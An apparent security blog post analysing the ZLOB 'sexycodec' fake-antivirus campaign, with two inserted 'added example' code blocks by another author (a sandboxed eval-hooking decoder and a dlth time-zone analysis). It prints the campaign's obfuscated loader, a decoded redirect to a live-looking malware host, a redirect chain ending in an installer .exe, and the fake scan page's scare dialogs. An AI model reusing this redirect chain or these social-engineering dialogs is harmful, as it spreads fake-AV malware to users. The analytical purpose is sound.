
ZLOB sexy codec & Co


i think you know, sexycodec and fake AVs were propagated using e.g.
blog spamming
search engines
fake porn sites
hacked bbs and blogs

in the 'hacked' case, they use obfuscated javascript to do a 'document.write'.
both sexycodec and fakeAV use the same "obfuscating engine".
play with its parameters and you are able to generate your "malware threat of the day"
using their own cgi script.

sample:
hxyp://lineacount.info/cgi-bin/search?id=802
will send something like this:

function a(JR,O){if(!O){O='EZVq#t&d$k@grNiSHTa_ve.Gp0xM1n-3`{/|h[+JFBmzD%RWQl16,(h&65280)>>8,h&255);}eval(Gg);}a('0&]|n.L[MJHRnokBn&vFk*l*p

decoded:

document.write(' document.location="http://blazervips.com/soft.php?aid=013601&d=3&product=XPA" ');

this site will redirect you to:

http://antivirus2009-scanner.com/2009/1/freescan.php?aid=77013601
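to show how such a document.write stage can be peeled off without letting it anywhere near a real browser, here is an added example (my own, not kat's code and not the campaign's): a constructed toy obfuscator of the same shape as the charset-keyed function a() above (the real one is cut off in the post), and a Node.js harness that runs the script with eval, document and window shadowed by capturing stubs and pulls the document.location target out of whatever gets written. the key alphabet, the redirect.example host, the shift of 7 and the function names are all made up for this example.

```javascript
// added example: toy stand-in for the campaign's charset-keyed obfuscator plus a
// hooked-eval harness that captures the decoded stage instead of running it in a browser.
// key alphabet, sample URL host (redirect.example) and function names are constructed here.

// alphabet the toy obfuscator rotates within; every char of the payload must appear in it
const KEY = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 .:/=\"'()?&;_-";
const SHIFT = 7;

// the decoded stage the toy sample reproduces (same shape as the decoded line in the post)
const PLAIN =
  'document.write(\' document.location="http://redirect.example/soft.php?aid=013601&d=3&product=XPA" \');';

// encoder used only to build the sample: rotate each in-alphabet char forward by SHIFT
function shiftEncode(text, key, shift) {
  let out = "";
  for (const ch of text) {
    const p = key.indexOf(ch);
    out += p < 0 ? ch : key.charAt((p + shift) % key.length);
  }
  return out;
}

// the constructed obfuscated sample: decoder a() followed by a call with the encoded payload.
// JSON.stringify turns the key and the payload into valid JS string literals.
const SAMPLE =
  "function a(s,k){if(!k){k=" + JSON.stringify(KEY) + ";}var o='';" +
  "for(var i=0;i<s.length;i++){var p=k.indexOf(s.charAt(i));" +
  "o+=p<0?s.charAt(i):k.charAt((p+k.length-" + SHIFT + ")%k.length);}eval(o);}" +
  "a(" + JSON.stringify(shiftEncode(PLAIN, KEY, SHIFT)) + ");";

// run untrusted script text with eval/document/window shadowed by capturing stubs.
// new Function(...) bodies are sloppy-mode, so a parameter may be named eval; the script's
// eval(o) then resolves to our hook instead of the real one and the decoded stage is logged.
function runWithHooks(scriptText) {
  const captured = { evals: [], writes: [], redirects: [] };
  const fakeDocument = {
    write(markup) {
      captured.writes.push(String(markup));
      const m = /document\.location\s*=\s*["']([^"']+)["']/.exec(String(markup));
      if (m) captured.redirects.push(m[1]);
    },
  };
  const fakeWindow = { screen: { width: 1024, height: 768 } };
  function hookedEval(code) {
    captured.evals.push(String(code));
    // feed the decoded stage back through the same hooks so multi-layer eval chains unwind too
    return new Function("eval", "document", "window", String(code))(hookedEval, fakeDocument, fakeWindow);
  }
  new Function("eval", "document", "window", scriptText)(hookedEval, fakeDocument, fakeWindow);
  return captured;
}

// stand-alone run
const result = runWithHooks(SAMPLE);
console.log("decoded stage:", result.evals[0]);
console.log("redirect target:", result.redirects[0]);
```

the point of the harness is that nothing from the sample gets a real eval or a real DOM: every stage lands in the captured arrays, and the redirect target falls out of the written markup by regex, which is all you need to feed a blocklist or a detection rule.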

code snippet:

showwindow('x:'+window.screen.width/2+'; y:'+(window.screen.height/2-30), 'w:1; h:1');

is_XP_SP2     = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
  is_IE=false;
  if (navigator.appName.toLowerCase()=='microsoft internet explorer'){
    if (navigator.userAgent.toLowerCase().indexOf('opera')

at this point we get '&dlth'.
the new request is:
/_download.php?aid=77013601&dlth
taken from:

	var rrc = 0;
function onloadExecutable()
{
	dat=new Date(1214833699);
	var dlth=dat.getHours()-dat.getUTCHours();
	rrc = 1;
	location.href="/_download.php?aid=77013601&dlth="+dlth;
};
function hideActiveXDialog()
{
	if(confirm('Dont close this window if you want your PC to be clean.'))
	{
		onloadExecutable();
	}
	else
	{
		if(state.toString() == 'STOPSCAN')
		{
			state.set('BEGINSCAN');
		};
	}
};

function hideWarnDialog()
{
	if(confirm('Dont close this window if your want you PC to be clean.'))	{
		onloadExecutable();
	}
	else	{
		alert_and_dl();
	};
};
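what the dlth parameter actually tells the server, as an added example (mine, not from the post and not the fake-AV page's code): the same getHours()-getUTCHours() arithmetic as in onloadExecutable() above, worked against fixed UTC offsets instead of the host clock, plus the midnight wrap-around that makes the raw value jump by 24 and the folding you would apply before reading it as a time zone. the function names and the offsets used are constructed.

```javascript
// added example: what the fake-AV page's dlth = getHours() - getUTCHours() conveys.
// rebuilt against explicit UTC offsets so the result does not depend on the host clock.

// hour difference the page's onloadExecutable() would compute for a client whose local
// time is utcHour:utcMinute + offsetMinutes (e.g. 540 for UTC+9, -300 for UTC-5)
function dlthFor(utcHour, utcMinute, offsetMinutes) {
  const localMinutes = ((utcHour * 60 + utcMinute + offsetMinutes) % 1440 + 1440) % 1440;
  const localHour = Math.floor(localMinutes / 60);
  return localHour - utcHour; // raw value that ends up in &dlth=
}

// the raw value wraps at midnight: UTC+9 at 17:00 UTC yields 2 - 17 = -15, not 9.
// fold it into [-12, 12) to get the whole-hour offset back; half-hour zones and UTC+13/+14
// cannot be told apart from this single number, so it is a coarse hint, not a fingerprint.
function normalizeDlth(raw) {
  return ((raw + 12) % 24 + 24) % 24 - 12;
}

// check that folding undoes the wrap for every whole-hour offset in [-12, 12) at every UTC hour
function wrapIsRecoverable() {
  for (let offsetHours = -12; offsetHours < 12; offsetHours++) {
    for (let utcHour = 0; utcHour < 24; utcHour++) {
      if (normalizeDlth(dlthFor(utcHour, 0, offsetHours * 60)) !== offsetHours) return false;
    }
  }
  return true;
}

console.log(dlthFor(17, 0, 540), normalizeDlth(dlthFor(17, 0, 540)));  // -15 9
console.log(dlthFor(3, 0, -300), normalizeDlth(dlthFor(3, 0, -300)));  // 19 -5
console.log("wrap recoverable for all whole-hour offsets:", wrapIsRecoverable());
```

so the campaign is not learning anything sensitive from dlth, just roughly which part of the world the victim sits in, and on a raw request log you have to fold the value before it means anything.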

again we were redirected:
hZZp://antivirus2009-scanner.com/2009/download/trial/AV2009Install_77013601.exe
hurray! now we can have a trial version of AV2009!

stay informed about their newest campaigns by using their own engines.
funny, isn't it?

greets,
kat

sry, i'm still fighting with oc's blog formatting shit
and still haven't solved it

"Destroy him! He is only a USER!" (MCP)